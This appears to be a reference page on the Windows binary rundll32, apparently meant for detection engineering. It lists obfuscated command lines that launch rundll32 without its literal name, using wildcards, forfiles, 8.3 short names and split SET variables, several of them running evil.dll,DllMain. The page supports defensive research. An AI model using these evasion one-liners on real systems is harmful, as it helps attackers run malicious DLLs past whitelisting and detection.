rundll32
Loads and runs DLLs. Used to execute malicious DLL exports directly, bypassing application whitelisting.
Binary Paths
C:\Windows\System32\rundll32.exeC:\Windows\SysWOW64\rundll32.exe
Glob Patterns
| Pattern | Notes |
|---|---|
for /f %i in ('where rundll3?.exe') do %i
|
Wildcard replaces '2' |
for /f %i in ('where r*32.exe') do %i
|
Star matches 'undll' |
for /f %i in ('where rundll*.exe') do %i
|
Star matches '32' |
for /f %i in ('dir /b C:\Windows\System32\rundll*.exe') do %i
|
dir glob search |
for %i in (C:\Windows\System32\rundll*.exe) do @%i evil.dll,DllMain
|
Native CMD for loop with filesystem glob — expands rundll*.exe directly in System32 without where.exe |
for /f %i in ('where /r C:\Windows rundll*.exe') do %i evil.dll,DllMain
|
Recursive where search across Windows tree — finds rundll32.exe in System32 and SysWOW64 |
forfiles /p C:\Windows\System32 /m rundll*.exe /c "@file evil.dll,DllMain"
|
forfiles * mask finds rundll32.exe — @file expands to matched filename for DLL execution |
C:\Windows\System32\RUNDLL~1.EXE evil.dll,DllMain
|
8.3 SFN — RUNDLL~1 auto-generated for rundll32.exe; requires NtfsDisable8dot3NameCreation=0 |
set a=rundll& set b=32& call %a%%b%.exe evil.dll,DllMain
|
Binary name split across two SET variables — CALL resolves %a%%b%.exe=rundll32.exe; name never appears as a literal string |
cmd /c for /f %i in ('where rundll*.exe') do %i evil.dll,DllMain
|
cmd /c wrapper adds an extra process layer — glob resolves via where; parent process becomes cmd.exe not the caller |
Pattern Tester
$
Try typing rundll32 or a full path like C:\Windows\System32\rundll32.exe
YARA Rule
Auto-generated detection rule for rundll32